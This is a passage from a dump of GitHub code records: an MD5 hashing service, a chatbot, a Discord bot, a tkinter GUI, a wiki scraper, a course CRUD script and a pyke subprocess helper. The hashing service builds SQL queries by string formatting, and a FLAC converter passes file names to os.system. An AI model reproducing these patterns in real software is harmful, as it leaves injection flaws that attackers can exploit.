cursor = connection.cursor()\n cursor.execute(query)\n res = cursor.fetchall()\n connection.commit()\n connection.close()\n return res\n\n# I use streaming download with 4Kb chunks,\n# in case of someone decide to hash full Game of Thrones in Blu-ray\ndef md5_sum(f):\n hash_md5 = md5()\n for chunk in f.iter_content(4096):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\ndef send_email(result, url, status, email):\n try:\n with app.app_context():\n msg = Message(\n str({ \"md5\" : result, \"url\" : url, \"status\" : status}),\n sender = \"veryveryuniquemail@gmail.com\",\n recipients = [email]\n )\n mail.send(msg)\n return True\n except:\n return False\n\ndef failed(url, email, token, step):\n if (step == \"Download\"):\n run_sql(\"INSERT INTO tasks VALUES (\\\"%s\\\", \\\"\\\", \\\"%s\\\", -1);\" % (token, url))\n elif (step == \"Hash\"):\n run_sql(\"UPDATE tasks SET md5 = \\\"\\\", status = -1 WHERE id = \\\"%s\\\";\" % token)\n if (email != None):\n send_email(\"None\", url, \"%s error\" % step, email)\n return\n\ndef run_task(url, email):\n token = get_current_job().id\n f = 0\n try:\n f = requests.get(url, stream=True)\n assert(f.status_code == 200)\n except:\n failed(url, email, token, \"Download\")\n return \"Download error\"\n\n run_sql(\"INSERT INTO tasks VALUES (\\\"%s\\\", \\\"\\\", \\\"%s\\\", 0);\" % (token, url))\n result = \"\"\n try:\n result = md5_sum(f)\n except:\n failed(url, email, token, \"Hash\")\n return \"Hash error\"\n run_sql(\"UPDATE tasks SET md5 = \\\"%s\\\", status = 1 WHERE id = \\\"%s\\\";\" % (result, token))\n status = \"Done\"\n if (email != None and send_email(result, url, status, email) == False):\n status = \"Email sending error: %s\" % email\n return status\n\n","repo_name":"ManWhoLaughs/md5hash_service","sub_path":"app/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10540378958","text":"from nekyo import *\n\n\n################################################################\n# 実行ブロック\n################################################################\ndef prompt(obj):\n \"\"\"\n :param obj 返答するオブジェクト:\n :return 返答内容:\n \"\"\"\n\n return obj.get_name() + ':' + obj.get_responder_name() + '> '\n\n\nprint('nobrainNekyo')\n\nnekyo = Nekyo('nekyo')\n\nwhile True:\n inputs = input(' > ')\n if not inputs:\n print('バイバイ')\n break\n response = nekyo.dialogue(inputs)\n print(prompt(nekyo), response)\n","repo_name":"nekyoJap/NoBrainNekyo","sub_path":"exeNekyo.py","file_name":"exeNekyo.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10598125252","text":"message = input('input your message:')\nmessage = message.lower()\nmessage = message.replace(' ','')\nmessage= list(message)\nresult = True\nfor i in range(int(len(message)/2)):\n if message[i] == message[len(message) - i - 1]:\n continue\n else:\n result = False\n break\n\nif result:\n print(\"its a palindrome\")\nelse:\n print('its not a palindrome')","repo_name":"Ghostpupper/Pythoncourse","sub_path":"5.1.11.7 LAB.py","file_name":"5.1.11.7 LAB.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"138132887","text":"# pip install discord.py, beautifulsoup4, lxml, python-dotenv\r\nimport os\r\n\r\nimport discord\r\nfrom dotenv import load_dotenv\r\n\r\n\r\n\r\nif 
__name__ == '__main__':\r\n load_dotenv()\r\n TOKEN = os.getenv('DISCORD_TOKEN')\r\n GUILD = os.getenv('DISCORD_GUILD')\r\n\r\n client = discord.Client()\r\n\r\n @client.event\r\n async def on_ready():\r\n guild = discord.utils.find(lambda g: g.name == GUILD, client.guilds)\r\n print(\r\n f'{client.user} is connected to the following guild:\\n'\r\n f'{guild.name}(id: {guild.id})'\r\n )\r\n\r\n @client.event\r\n async def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(\r\n f'Hi {member.name}, welcome to my Discord server! Make yourself at home. Hop in one of our voice channels any time, we have a great community that would love for you to hop in. If you have any questions hit up a Guru for guidance.'\r\n )\r\n \r\n\r\n client.run(TOKEN)","repo_name":"Misterguruman/GuruBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34845101995","text":"# Test for RegPore2D.\n\nfrom RecPore2D import RegPore2D as rp\na = rp(nx=11,ny=5,radius=0.02,packing='tri')\n\n\n#a.bounding_box=[[0.0,0.0,0.5], [1.0,1.0,1.0]]\na.write_mesh(meshtype='snappy')\na.write_mesh(fname='a.geo',meshtype='gmsh')\n\n\n","repo_name":"jjhidalgo/RecPore2D","sub_path":"tests/testsnappy.py","file_name":"testsnappy.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39365299882","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\n\n\n# Create all the GUI elements, and handle button clicks\ndef buildGUI(DAO):\n\n # Main Tkinter window\n mainWindow = tk.Tk()\n mainWindow.configure(background = \"#44475a\")\n #mainWindow.geometry(\"400x200\")\n mainWindow.resizable(0,0)\n mainWindow.title(\"concert-tracker-gui\")\n\n # Labels and text entry boxes\n artistLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Artist:\")\n artistEntry = Entry(mainWindow, width=40, borderwidth=0)\n \n dateLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Date (YYYY-MM-DD):\", )\n dateEntry = Entry(mainWindow, width=40, borderwidth=0)\n \n venueLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Venue:\")\n venueEntry = Entry(mainWindow, width=40, borderwidth=0)\n\n spacer = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"\")\n\n # Button objects\n addButton = Button(mainWindow, bg = \"#50fa7b\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"Add\", cursor = \"hand2\", command=lambda: addEntryFromGUI(DAO, artistEntry, dateEntry, venueEntry))\n \n viewButton = Button(mainWindow, bg = \"#8be9fd\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"View Table\", cursor = \"hand2\", command=lambda: viewTable(mainWindow, DAO))\n \n clearButton = Button(mainWindow, bg = \"#ff5555\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"Clear the table\", cursor = \"hand2\", command=lambda: clearTable(DAO, mainWindow))\n\n closeButton = Button(mainWindow, width = 38, bd='0', activebackground = \"#f1fa8c\", text=\"Exit\", cursor = \"hand2\", command=lambda: closeMainWindow(mainWindow))\n\n # Place all gui elements with grid method, Sticky is how I am justifying left\n artistLabel.grid(row=0, column=0)\n artistEntry.grid(row=1, column=0)\n dateLabel.grid(row=2, column=0)\n dateEntry.grid(row=3, column=0)\n venueLabel.grid(row=4, column=0)\n venueEntry.grid(row=5, column=0)\n 
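# --- illustrative aside, not part of the corpus records above or below ---
# Every Button in the tracker GUI above is wired through `command=lambda: ...`.
# The lambda is load-bearing: writing command=addEntryFromGUI(...) would call
# the handler once while the window is being built and register its return
# value (None) as the callback. Tiny self-contained sketch of the pattern;
# the widget names are made up for illustration.
import tkinter as tk

def on_add(widget):
    print("adding:", widget.get())

root = tk.Tk()
entry = tk.Entry(root)
entry.pack()
# deferred: the lambda body runs only when the button is actually clicked
tk.Button(root, text="Add", command=lambda: on_add(entry)).pack()
# root.mainloop()  # left commented so the sketch stays import-safe
# --- end aside ---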
spacer.grid(row=6, column = 0)\n addButton.grid(row=7, column=0)\n viewButton.grid(row=8, column=0)\n clearButton.grid(row=9, column=0)\n closeButton.grid(row=10, column = 0)\n\n mainWindow.mainloop()\n\n# Add a new tuple to the table when add is clicked\ndef addEntryFromGUI(DAO, artistEntry, dateEntry, venueEntry):\n\n # Get the values from GUI\n artist = artistEntry.get()\n date = dateEntry.get()\n venue = venueEntry.get()\n\n # Call the DAO to add an entry based on the strings in the text boxes\n DAO.addEntry(artist, date, venue) \n\n # Clear the GUI text boxes\n artistEntry.delete(0, END)\n dateEntry.delete(0, END)\n venueEntry.delete(0,END)\n\n# Clear the table by dropping and rebuilding it\ndef clearTable(DAO, mainWindow):\n\n # Bring up a new window to confirm clearing the table\n popupWindow = tk.Toplevel(mainWindow)\n popupWindow.resizable(0,0)\n popupWindow.title(\"Confirm\")\n popupWindow.configure(background = \"#44475a\")\n\n confirmClear = Button(popupWindow, bg = \"#ff5555\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Confirm clear\", command=lambda: clearConfirmed(DAO, popupWindow))\n \n confirmClear.grid(sticky = W, row = 0, column = 0)\n\n # Actually send SQL command to clear table if confirmation pressed\n # I have a feeling this could definitely be simplified\n def clearConfirmed(DAO, popupWindow):\n DAO.clearTable()\n popupWindow.destroy()\n \ndef viewTable(mainWindow, DAO):\n \n # New popup to display the table\n popupWindow = tk.Toplevel(mainWindow)\n popupWindow.resizable(0,0)\n popupWindow.title(\"Table view\")\n popupWindow.configure(background = \"#44475a\")\n\n entries = DAO.collectAllEntries()\n \n # TODO: Get a better understanding of how to style this treeview\n\n # Set ttk style need to color treeview\n style = ttk.Style(popupWindow)\n style.theme_use(\"clam\")\n #style.configure(\"Treeview\", background=\"#44475a\", foreground=\"#f8f8f2\")\n style.configure(\"Heading\", background = \"#44475a\", foreground=\"#f8f8f2\", relief=\"flat\")\n \n # Declare treeview and insert information from list\n cols = ('Number', 'Artist', 'Date', 'Venue')\n listBox = ttk.Treeview(popupWindow, columns=cols, show='headings')\n \n for i, (Number, Artist, Date, Venue) in enumerate(entries, start=1):\n listBox.insert(\"\", \"end\", values=(Number, Artist, Date, Venue))\n\n for col in cols:\n listBox.heading(col, text=col) \n listBox.grid(row=0, column=0, columnspan=2)\n\n # Function called by close button\n def closeViewTable():\n popupWindow.destroy()\n\n # Function called by print button\n # TODO Finish this function\n def printViewTable():\n return\n\n # Buttons at the bottom of the view page\n closeButton = tk.Button(popupWindow, bg = \"#ff5555\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Close\", width=15, command=closeViewTable)\n closeButton.grid(sticky = W, row=4, column=0)\n printButton = tk.Button(popupWindow, bg = \"#8be9fd\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Print\", width=15, command=printViewTable)\n printButton.grid(sticky = E, row=4, column=1)\n\ndef closeMainWindow(mainWindow):\n mainWindow.destroy()\n ","repo_name":"mitchfen/concert-tracker","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42490138422","text":"# UNI: jjl2245, me2680\n\"\"\"A script that converts flac files to wav files\"\"\"\n\nimport glob, os\n\npath = '../data/AR/' # the folder to go through all audio files 
for\nos.chdir(path) # set the working directory\nfor f in glob.glob(\"*.flac\"): # go through all files that are flac files\n os.system('ffmpeg -i ' + path + f + ' ' + path + f.rsplit( \".\", 1 )[ 0 ] + '.wav') # use ffmpeg to convert it to wav\n os.remove(path + f) # delete the old flac file\n\nfor f in glob.glob(\"*.flac\"): # make sure that there are no flac files remaining\n print(f) # print the file path if there is one\n","repo_name":"jjlee0802cu/open-set-lid","sub_path":"s5_r3/scripts/scripts_data/flac_to_wav.py","file_name":"flac_to_wav.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20761870548","text":"import json\nimport codecs\nimport requests\nfrom os import mkdir\nfrom bs4 import BeautifulSoup\n\nLIMBO_PROJECTS_TABLE_INDEX = -1\nPWN_GAME_TABLE_INDEX = -4\nNINJAS_TABLE_INDEX = 0\nACTIVES_TABLE_INDEX = 1\nZOMBIES_TABLE_INDEX = 2\nPENSIONS_TABLE_INDEX = 3\nCOMMEMORATION_TABLE_INDEX = 4\nTABLE_OFFSET = 15\nLAST_CHALLENGES_TABLE = 37\nUSELESS_TABLE_1 = 17\nUSELESS_TABLE_2 = 19\n\ng_users = [{'status': 'ninja', 'users': []},\n {'status': 'active', 'users': []},\n {'status': 'zombie', 'users': []},\n {'status': 'pension', 'users': []},\n {'status': 'commemoration', 'users': []}]\n\n\ndef soup_site(url):\n r = requests.get(url)\n\n return BeautifulSoup(r.text, 'html.parser')\n\n\ndef write_content(path: str, content):\n \"\"\"Writes the content of the found users and solved challenges to a file.\n :param path: where the file will be save.\n :type path: str\n :param content: the cotent to be written into the file.\n \"\"\"\n while True:\n try:\n with codecs.open(path, 'w', encoding='utf-8') as file:\n json.dump(content, file, ensure_ascii=False)\n\n break\n except IOError:\n mkdir(path[:path.index('\\\\')])\n\n\ndef download_image(content, title):\n while True:\n try:\n with open(\"pics\\\\\" + title + \".png\", \"wb\") as file:\n file.write(content)\n\n break\n except FileNotFoundError:\n mkdir(\"pics\")\n\n\ndef users_tables_organize(tables):\n \"\"\"connect to all the function that collects data about users and organize the data.\n :param tables: all of the tables in the page.\n :type tables: bs4 element.\n \"\"\"\n global g_users\n\n ninja, active, zombie, pension, commemoration, *_ = tables\n\n ninja_active(ninja, NINJAS_TABLE_INDEX)\n ninja_active(active, ACTIVES_TABLE_INDEX)\n zombie_info(zombie)\n pension_commemoration_info(pension, PENSIONS_TABLE_INDEX)\n pension_commemoration_info(commemoration, COMMEMORATION_TABLE_INDEX)\n\n for s in g_users:\n write_content(\"users\\\\\" + s['status'] + \".json\", s['users'])\n\n\ndef ninja_active(table, table_index):\n for tr in table.tbody.find_all('tr')[1:]:\n _, name, *_, houses = tr.find_all('td')\n houses = [house['title'] for house in houses.find_all('a')]\n g_users[table_index]['users'].append(dict({'name': name.a.text, 'houses': houses}))\n\n\ndef zombie_info(table):\n for tr in table.tbody.find_all('tr')[1:]:\n _, name, _, remark, *_, houses = tr.find_all('td')\n\n houses = [house['title'] for house in houses.find_all('a')]\n g_users[ZOMBIES_TABLE_INDEX]['users'].append(\n dict({'name': name.a.text, 'houses': houses, 'remarks': remark.text.replace('\\n', '')}))\n\n\ndef pension_commemoration_info(table, table_index):\n for tr in table.tbody.find_all('tr')[1:]:\n name, *_, houses = tr.find_all('td')\n\n if houses.a is not None:\n houses = [house['title'] for house in houses.find_all('a')]\n\n 
g_users[table_index]['users'].append(dict({'name': name.text.replace('\\n', ''), 'houses': houses}))\n else:\n g_users[table_index]['users'].append(dict({'name': name.text.replace('\\n', ''), 'houses': []}))\n\n\ndef games_tables_organize(tables):\n \"\"\"connect to all of the functions that collects data about the games and organize the data.\n :param tables: all of the tables in the page.\n :type tables: bs4 element\n \"\"\"\n games = [{'name': 'samorai_c', 'ranks': []},\n {'name': 'python_slayer', 'ranks': []},\n {'name': 'coffee_makers', 'ranks': []}]\n\n *_, samorai_c, python_slayer, coffee_makers, _, _, _, _ = tables\n\n for i, game_name in enumerate([samorai_c, python_slayer, coffee_makers]):\n games[i]['ranks'] = import_games(game_name)\n\n\ndef import_games(table) -> list:\n \"\"\"Gets all the games of beta and the first 3 rankes.\n :param table: the context to be analyzed.\n :type table: bs4 element\n :return: game table with the name of it and first 3 ranks.\n :rtype: list\n \"\"\"\n ranks = list()\n\n for row in table.find_all('tr')[1:4]:\n *_, title, _, image = row.find_all('td')\n\n title = title.text.replace('\\n', '')\n image = image.a.img['src']\n\n r = requests.get('https:' + image)\n\n download_image(r.content, title)\n\n ranks.append(dict({'title': title, 'image': r.content}))\n\n return ranks\n\n\ndef import_challenges_organize(tables, challenges: list):\n for table in range(TABLE_OFFSET, LAST_CHALLENGES_TABLE):\n if table != USELESS_TABLE_1 and table != USELESS_TABLE_2:\n challenges[table - TABLE_OFFSET - (table > USELESS_TABLE_1) - (table > USELESS_TABLE_2)][\n 'challenges'] = import_challenges(tables[table])\n\n for challenge in challenges:\n write_content(\"challenges_tables\\\\\" + challenge['table_name'] + \".json\", challenge['challenges'])\n\n\ndef import_challenges_table_name(soup) -> list:\n \"\"\"Gets the challenges names from the page (c, python, java... etc)\n :param soup: all of the page in 'lxml' format.\n :type soup: bs4 element\n :return: list of the challenges names\n :rtype: list\n \"\"\"\n challenges_table_names = list()\n div_tags = soup.find_all('div', class_=\"mw-content-ltr\")\n\n for div_tag in div_tags:\n li_tags = div_tag.find_all('li', class_=\"toclevel-1 tocsection-54\")\n\n for li_tag in li_tags:\n challenges_table_names = [challenge_name.text for challenge_name in\n li_tag.find_all('span', class_=\"toctext\")[1:]]\n\n break\n challenges_table_names = [{'table_name': challenges_table_names[i], 'challenges': []} for i in\n range(len(challenges_table_names))]\n\n return challenges_table_names\n\n\ndef import_challenges(table) -> list:\n \"\"\"Gets the challenges of each category from the page (c, python, java... 
etc)\n :param table: each table is a new category.\n :type table: bs4 element\n :return: list of the challenges of each category\n :rtype: list\n \"\"\"\n challenges = list()\n\n for row in table.tbody.find_all('tr')[1:]:\n challenge_name, points, _, discription, _, dl = row.find_all('td')\n\n dl = dl.text.replace('\\n', '')\n\n if dl == '':\n dl = '-'\n\n challenges.append(dict({'challenge_name': challenge_name.text.replace('\\n', ''),\n 'points': points.text.replace('\\n', ''),\n 'discription': discription.text.replace('\\n', ''),\n 'deadline': dl}))\n\n return challenges\n\n\ndef solved_challenges_table_organize():\n \"\"\"connects to all of the functions that collects data on the solved challenges table an organize\n the data.\n \"\"\"\n solved_challenges = list()\n second_page_url = 'https://beta.wikiversity.org/wiki/User:The_duke/solved_beta_challenges'\n\n soup = soup_site(second_page_url)\n tables = soup.find_all('table')\n heads = soup.find_all('h3')\n\n table_names = [table_name.text.replace('[edit]', '') for table_name in heads if '[edit]' in table_name.text]\n\n for table_name in range(len(table_names)):\n challenges_and_solvers = import_solved_challenges(tables[table_name])\n solved_challenges.append({'subject': table_names[table_name], 'challenges': challenges_and_solvers})\n\n for solved_challenge in solved_challenges:\n write_content('solved_challenges\\\\' + solved_challenge['subject'] + '.json', solved_challenge)\n\n\ndef import_solved_challenges(table) -> list:\n \"\"\"Gets the solved challenges and their solvers.\n :param table: the context to be analyzed (isnt the same as the previous ones).\n :type table: bs4 element\n :return: challenges name and its solvers.\n :rtype: list\n \"\"\"\n solved_challenges_table = list()\n\n for row in table.find_all('tr')[1:]:\n challenge_name, solvers = row.find_all('td')\n challenge_name = challenge_name.text.replace('\\n', '')\n solvers = solvers.text.replace('\\n', '').split('* ')[1:]\n solved_challenges_table.append(dict({'challenge_name': challenge_name, 'solvers': solvers}))\n\n return solved_challenges_table\n\n\ndef get_pwn_game(table):\n ninja_games_ranks = list()\n\n for row in table.find_all('tr')[1:]:\n try:\n _, image, *_ = row.find_all('td')\n\n title = image.a['title']\n image_url = 'https:' + image.img['src']\n\n r = requests.get(image_url)\n\n download_image(r.content, title)\n\n ninja_games_ranks.append(dict({'title': title, 'image': str(r.content)}))\n except TypeError:\n continue\n write_content(\"Ninja_games\\\\pwn_game.json\", ninja_games_ranks)\n\n\ndef limbo_projects(main_projects_in_limbo_table):\n projects = list()\n\n for row in main_projects_in_limbo_table.find_all('tr')[1:]:\n project_name, contact, description, last_seen = row.find_all('td')\n project_name = project_name.text.replace('\\n', '')\n contact = contact.text.replace('\\n', ', ')\n description = description.text.replace('\\n', '')\n last_seen = last_seen.text.replace('\\n', '')\n\n projects.append({'project_name': project_name,\n 'contact': contact,\n 'description': description,\n 'last_seen': last_seen})\n\n write_content(\"projects\\\\limbo_projects.json\", projects)\n\n\ndef main():\n main_page_url = \"https://beta.wikiversity.org/wiki/%D7%9C%D7%99%D7%9E%D7%95%D7%93%D7%99_%D7%9E%D7%97%D7%A9%D7%91\" \\\n \"%D7%99%D7%9D_%D7%91%D7%A9%D7%99%D7%98%D7%AA_%D7%91%D7%98%D7%90 \"\n\n soup = soup_site(main_page_url)\n main_tables = soup.find_all('table', class_=\"wikitable sortable\")\n challenges_tables = soup.find_all('table', class_=\"wikitable\")\n\n 
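# --- illustrative aside, not part of the corpus records above or below ---
# The wiki scraper keeps repeating one idiom: find_all('tr'), slice off the
# header row, then unpack the <td> cells of each remaining row. A minimal
# sketch of that idiom on an inline HTML snippet; the snippet and names are
# invented for illustration.
from bs4 import BeautifulSoup

html = """<table>
  <tr><th>name</th><th>points</th></tr>
  <tr><td>alice</td><td>40</td></tr>
  <tr><td>bob</td><td>25</td></tr>
</table>"""

soup = BeautifulSoup(html, 'html.parser')
rows = []
for tr in soup.table.find_all('tr')[1:]:    # [1:] skips the header row
    name, points = (td.text for td in tr.find_all('td'))
    rows.append({'name': name, 'points': int(points)})
# rows == [{'name': 'alice', 'points': 40}, {'name': 'bob', 'points': 25}]
# --- end aside ---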
challenges = import_challenges_table_name(soup)\n users_tables_organize(main_tables)\n games_tables_organize(main_tables)\n solved_challenges_table_organize()\n import_challenges_organize(challenges_tables, challenges)\n get_pwn_game(main_tables[PWN_GAME_TABLE_INDEX])\n limbo_projects(main_tables[LIMBO_PROJECTS_TABLE_INDEX])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"itayboop/scraper.db","sub_path":"updated_scraper.py","file_name":"updated_scraper.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38868230914","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport plotsettings\nfrom matplotlib.font_manager import FontProperties\nfrom scipy.integrate import odeint\nfrom mpl_toolkits.axes_grid.inset_locator import (inset_axes, InsetPosition, mark_inset)\n\n#data location\nfile_location ='/home/ashok/gravitational_wave_memory_project/data/NonSpinning_differentMassRatio/Memory_data/'\n#import data\nmass_ratio_vec = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 7, 8, 9.5]\nfilename_vec=['q1', 'q1p5', 'q2', 'q2p5','q3','q4','q5','q6', 'q7', 'q8','q9p5']\n\nfilename = filename_vec[1]\n\ndatafile_hNRdot='rMPsi4_noSpin_'+filename+'dataClean_hdotNR.dat'\ndatafile_hNR='rMPsi4_noSpin_'+filename+'dataClean_hNR.dat'\ndatafile_hMemNR='rMPsi4_noSpin_'+filename+'dataClean_hMemNR.dat'\n\ntimeNR, hmem, h_mem_plus = np.loadtxt(file_location+datafile_hMemNR, unpack=True)\ntimeNR, hdot_plus, hdot_cross = np.loadtxt(file_location+datafile_hNRdot, unpack=True)\ntimeNR, h_plus, h_cross = np.loadtxt(file_location+datafile_hNR, unpack=True)\n\n#Making plots\nlegend_size = 5\nfig = plt.figure()\nfontP = FontProperties()\n\nplt.plot(timeNR, h_plus)\nplt.plot(timeNR, h_plus + (0.0002*(timeNR+1000))**2, 'r--')\nplt.xlim(-1000, 200)\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.xlabel(r'$t/M$')\nplt.ylabel(r'$(R/M)\\,h}_{+}$')\nplt.legend(loc=2)\nfontP.set_size('13.')\n\nplt.savefig(\"/home/ashok/Desktop/IPTA slides/Strain.png\")\nplt.show()\n\n","repo_name":"aschoudry/GWmemory","sub_path":"scripts/Make_IPTAplots.py","file_name":"Make_IPTAplots.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24297724864","text":"from os import system\n#REGUSTRO DE CURSOS , CRUD , CODIGO, CURSO, NOTAS\ndef menu():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*15 + \"REGISTRO DE NOTAS DE CURSOS\" + \"=\"*18)\n print(\"=\"*60)\n print(\"Opciones:\")\n print(\" [1] Consulta\")\n print(\" [2] Registro\")\n print(\" [3] Actualizar\")\n print(\" [4] Eliminar\")\n print(\" [0] Salir\")\n print(\"=\"*60)\n opcion = input(\"Ingrese el número de la acción que desea realizar: \")\n return opcion\n \n#DEFINIR VARIABLE DE ENTRADA Y SALIDA\ncursos = []\nsalir = \"0\"\n#LOGICA\ndef consulta():\n for a in cursos:\n for clave, valor in a.items():\n print(clave +\":\"+ valor)\n print(\"=\"*20)\n\ndef registro(id,nom,nota):\n nuevoCurso = {\n 'código' : id,\n 'nombre' : nom,\n 'calificación' : nota\n }\n cursos.append(nuevoCurso)\n\n\n\ndef actualizar():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*21 + \"ACTUALIZANDO DATOS\" + \"=\"*21)\n print(\"=\"*60)\n cursoActualizado = input(\"Ingrese el curso a actualizar: \")\n for i in range(len(cursos)):\n a = cursos[i]\n for clave,valor in a.items():\n if valor == cursoActualizado:\n print(a)\n posCurso = i\n break\n print(\"Actualizando datos:\")\n id = input(\"Código: \")\n nom = input(\"Nombre 
del curso: \")\n nota = input(\"Calificación: \") \n nuevoCurso = {\n 'código' : id,\n 'nombre' : nom,\n 'calificación' : nota\n }\n del cursos[posCurso]\n cursos.insert(posCurso,nuevoCurso)\n\ndef eliminar():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*13 + \"ELIMINACIÓN DE REGISTROS GUARDADOS\" + \"=\"*13)\n print(\"=\"*60)\n eliminar = input(\"Ingrese el curso a eliminar: \")\n for i in range(len(cursos)):\n a = cursos[i]\n for clave, valor in a.items():\n if valor == eliminar:\n posCurso = i\n print(a)\n break\n print(\"\\n---------------Curso Eliminado---------------\")\n del cursos[posCurso]\n\n \n\n#RESULTADO\nwhile(salir == \"0\"): \n opcion = menu()\n\n\n if opcion == \"1\":\n system('cls')\n print(\"=\"*60)\n print(\"=\"*20 + \"RESULTADO DE BUSQUEDA\" + \"=\"*19)\n print(\"=\"*60)\n consulta()\n print(\"Pulsa enter para regresar al menú\") \n input(\"\") \n\n\n if opcion == \"2\":\n system('cls')\n print(\"=\"*60)\n print(\"=\"*23 + \"NUEVO REGISTRO\" + \"=\"*23)\n print(\"=\"*60)\n print(\"Registrando nuevo alumno:\")\n id = input(\"Código: \")\n nom = input(\"Nombre del curso: \")\n nota = input(\"Calificación: \")\n r = registro(id,nom,nota)\n if r == 1:\n print(\"---------!registro exitoso!-------------\")\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? ¿no?\")\n op = input(\" \")\n if (op == \"si\"):\n system('cls')\n print(\"=\"*60)\n print(\"=\"*23 + \"NUEVO REGISTRO\" + \"=\"*23)\n print(\"=\"*60)\n print(\"Registrando nuevo alumno:\")\n id = input(\"Código: \")\n nom = input(\"Nombre del curso: \")\n nota = input(\"Calificación: \")\n r = registro(id,nom,nota)\n if r == 1:\n print(\"---------!registro exitoso!-------------\")\n if (op == \"no\"):\n break \n\n\n if opcion == \"3\":\n actualizar()\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? ¿no?\")\n op = input(\"\")\n if (op == \"si\"):\n actualizar()\n if (op == \"no\"):\n break\n\n\n if opcion == \"4\":\n eliminar()\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? 
¿no?\")\n op = input(\"\")\n if (op == \"si\"):\n eliminar()\n if (op == \"no\"):\n break\n\n\n if opcion == \"0\":\n break\n","repo_name":"AlexRodriguezVillavicencio/Backend","sub_path":"tarea/semana 1/4.RegCursos.py","file_name":"4.RegCursos.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5322900752","text":"import subprocess\nimport contextlib\nfrom pyke import knowledge_base, rule_base\n\n# claim_goal, fact, prove_all, gather_all\n\nclass special_knowledge_base(knowledge_base.knowledge_base):\n def __init__(self, engine):\n super(special_knowledge_base, self).__init__(engine, 'special')\n\n def add_fn(self, fn):\n if fn.name in self.entity_lists:\n raise KeyError(\"%s.%s already exists\" % (self.name, fn.name))\n self.entity_lists[fn.name] = fn\n\n def print_stats(self, f):\n pass\n\nclass special_fn(knowledge_base.knowledge_entity_list):\n def __init__(self, special_base, name):\n super(special_fn, self).__init__(name)\n special_base.add_fn(self)\n\n def lookup(self, bindings, pat_context, patterns):\n raise AssertionError(\"special.%s may not be used in forward chaining \"\n \"rules\" % self.name)\n\n def prove(self, bindings, pat_context, patterns):\n raise AssertionError(\"special.%s may not be used in backward chaining \"\n \"rules\" % self.name)\n\nclass special_both(special_fn):\n def prove(self, bindings, pat_context, patterns):\n return self.lookup(bindings, pat_context, patterns)\n\nclass claim_goal(special_fn):\n r'''\n >>> class stub(object):\n ... def add_fn(self, fn): pass\n >>> cg = claim_goal(stub())\n >>> mgr = cg.prove(None, None, None)\n >>> gen = iter(mgr.__enter__())\n >>> next(gen)\n >>> next(gen)\n Traceback (most recent call last):\n ...\n pyke.rule_base.StopProof\n >>> mgr.__exit__(None, None, None)\n >>> cg.lookup(None, None, None)\n Traceback (most recent call last):\n ...\n AssertionError: special.claim_goal may not be used in forward chaining rules\n '''\n def __init__(self, special_base):\n super(claim_goal, self).__init__(special_base, 'claim_goal')\n\n def prove(self, bindings, pat_context, patterns):\n def gen():\n yield\n raise rule_base.StopProof\n\n return contextlib.closing(gen())\n\ndef run_cmd(pat_context, cmd_pat, cwd_pat=None, stdin_pat=None):\n r'''\n >>> from pyke import pattern\n >>> run_cmd(None, pattern.pattern_literal(('true',)))\n (0, '', '')\n >>> run_cmd(None, pattern.pattern_literal(('false',)))\n (1, '', '')\n >>> ret, out, err = run_cmd(None, pattern.pattern_literal(('pwd',)))\n >>> ret\n 0\n >>> err\n ''\n >>> import os\n >>> cwd = os.getcwd() + '\\n'\n >>> out == cwd\n True\n >>> run_cmd(None, pattern.pattern_literal(('pwd',)),\n ... pattern.pattern_literal('/home/bruce'))\n (0, '/home/bruce\\n', '')\n '''\n stdin = None\n if stdin_pat is not None:\n data = stdin_pat.as_data(pat_context)\n if data is not None:\n stdin = data.encode()\n process = subprocess.Popen(cmd_pat.as_data(pat_context),\n bufsize=-1,\n universal_newlines=True,\n 